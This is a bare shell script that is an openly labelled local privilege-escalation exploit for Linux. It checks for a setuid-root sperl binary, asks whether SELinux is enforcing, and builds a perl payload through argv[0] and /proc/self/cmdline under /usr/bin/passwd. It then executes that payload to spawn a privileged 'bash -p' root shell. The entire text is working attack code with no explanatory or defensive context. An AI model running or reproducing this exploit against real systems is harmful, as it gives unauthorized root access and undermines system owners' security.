#!/bin/sh



perl=`which perl`
if [ -z "$perl" ]; then
echo "can't find perl, quitting"
exit 1
fi

perldir=`dirname "$perl"`
sperl=`find $perldir -name "sperl*" | head -n 1`
if [ -z "$sperl" ]; then
echo "can't find setuid perl, quitting"
exit 1
fi


ls -l $sperl | egrep "^.rws" >/dev/null
if [ $? -eq 1 ]; then
echo "$sperl is not setuid root, quitting"
exit 1
fi



selinux=1



if [ -f /etc/selinux/config ]; then


getenforce="getenforce"
which getenforce >/dev/null 2>&1
if [ $? -eq 1 ]; then

for dir in /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin; do
if [ -f $dir/getenforce ]; then
getenforce="$dir/getenforce"
break;
fi
done
fi


if [ "$getenforce" ]; then
mode=`$getenforce | tr "[A-Z]" "[a-z]"`
if [ "$mode" == "enforcing" ]; then
echo "SELinux is enforcing."
else
selinux=0;
fi
else
echo "Can't determine if SELinux is enabled."
fi
else
selinux=0
fi

if [ $selinux -eq 1 ]
then
echo "If SELinux is enabled, the exploit will most likely"
echo "fail and a system log message will be generated."
echo -n "Continue anyway [y/n]? "
read resp
if [ "$resp" != "y" -a "$resp" != "Y" ]
then
echo "aborting"
exit 1
fi
fi

cmd=`echo -ne '#\041'$perl'
$ENV{PATH}="/bin:/usr/bin:/sbin:/usr/sbin";
$h{$ARGV[0]}=1;
$pid=(keys(%h))[0];
system("sh", "-c", "kill $pid");
exec {"sh"} "bash", "-p";'`

(
cd /proc/self
chmod 6755 cmdline
exec -a "$cmd" /usr/bin/passwd >/dev/null 2>&1 
) & 

PID=$!

usleep 300000
kill -0 $PID >/dev/null 2>&1
if [ $? -eq 0 ]; then
exec /proc/$PID/cmdline $PID
else
echo "failed"
fi